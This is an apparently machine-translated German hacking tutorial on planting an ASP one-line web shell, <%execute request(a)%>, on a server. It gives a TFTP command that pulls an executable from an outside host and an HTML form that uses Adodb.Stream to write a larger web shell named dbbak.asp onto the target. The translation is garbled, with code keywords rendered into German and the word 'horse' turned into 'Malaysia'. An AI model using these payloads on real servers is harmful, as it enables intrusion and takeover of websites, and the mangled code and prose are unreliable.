Der Ein-Satz-Trojaner wird in die ASP-Datei eingefügt: Natürlich ist der Ein-Satz-Trojaner selbst die ASP-Datei. Zugriff über IE möglich: Nur wenn darauf zugegriffen werden kann, können wir die Daten übermitteln. Solange darauf zugegriffen werden kann, ist dies möglich
Zugriff über HTTP-Protokoll
In einem Satz der Einsatzbereich von Trojanern (ich habe nur 2 Typen aufgeführt):
1) Es ist nur eine Datenbanksicherung erforderlich
Wenn die Datenbank in einer ASP-Datei gesichert wird, tritt kein Kompilierungsfehler auf und das Flag zum Schließen des Skripts fehlt %>
2) Wenn Sie SA-Berechtigungen festlegen, schreiben Sie der Einfachheit halber normalerweise zuerst einen Satz (natürlich ist es schneller, Tauben direkt über TFTP hochzuladen und auszuführen).
tftp -i ip get server.exe
Das Prinzip des Trojanischen Pferdes <%execute request(a)%> in einem Satz:
erstmal wissen
Die Funktion „execute()“ wird zum Ausführen des von uns hochgeladenen Pferdes und zur Weitergabe an asp.dll zur Analyse verwendet. Der obige Code <%execute request(a)%> kann wie folgt erklärt werden:
<%
Wenn Anfrage(a)<> dann Anfrage(a) ausführen
%>
Wenn a nicht leer ist, wird es ausgeführt. Was wird ausgeführt?
wenn a != 0
Werfen wir einen Blick auf den Kunden:
<form action=http://192.168.0.28/shell.asp method=post>
<textarea name=l cols=120 rows=10 width=45>
set lP=server.CreateObject(Adodb.Stream) 'Adodb.Stream-Komponente erstellen..
lP.Öffnen
lP.Type=2
lP.CharSet=gb2312
lP.writetext request(p)
lP.SaveToFile server.mappath(dbbak.asp),2
lP.Schließen
setze lP=nichts
Response.redirect dbbak.asp
</textarea>
<textarea name=p cols=120 rows=10 width=45>Zu übermittelnde Daten</textarea><BR><center><br>
<Eingabetyp=Submit-Wert=Submit>
Adodb.Stream ist für das Hochladen gelesener Daten auf den Server verantwortlich:
Komponente: Adodb.Stream
Es gibt folgende Methoden:
Methode abbrechen
Wie man es benutzt
Objekt.Abbrechen
Beschreibung: Bricht die Ausführung eines ausstehenden asynchronen Execute- oder Open-Methodenaufrufs ab.
WriteText-Methode
So verwenden Sie es:
Object.Write(Daten,[Optionen])
Beschreibung: Laden Sie die angegebenen Textdaten in das Objekt.
Parameterbeschreibung: Daten sind der angegebene Inhalt, der geschrieben werden soll.
Optionen Die zu schreibenden Optionen, die nicht angegeben werden können. Die optionalen Parameter sind wie folgt:
adWriteChar =0
adWriteLine =1
SaveToFile-Methode
So verwenden Sie es:
Object.SaveToFile(FileName,[Optionen])
Beschreibung: Schreiben Sie den Inhalt des Objekts in die durch FileName angegebene Datei
Das heißt, der Dateiname, in dem wir den Trojaner speichern, lautet dbbak.asp
Parameterbeschreibung: Durch FileName angegebene Datei
Optionen für den Zugriff, die nicht angegeben werden können. Die optionalen Parameter sind wie folgt:
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
Nach der Übermittlung eines Satztrojaners ist der Wert von a leer und der Zugriff auf http://www.***.com/**.asp ist der Warteprozess zur Vorbereitung der Ausführung mit dem Befehl „execute(“. ) Funktion.. .
Erstellen Sie einen Adodb.Stream, der für das Schreiben unserer Daten auf den Server verantwortlich ist ...
Gleichzeitig definiert die von dieser Komponente definierte Variable SaveToFile unseren malaysischen Namen..dbbak.asp
Nach der Übermittlung an den Server erkennt die Funktionexecute(), dass der Wert von a nicht leer ist, und führt daher unser Malaysia aus!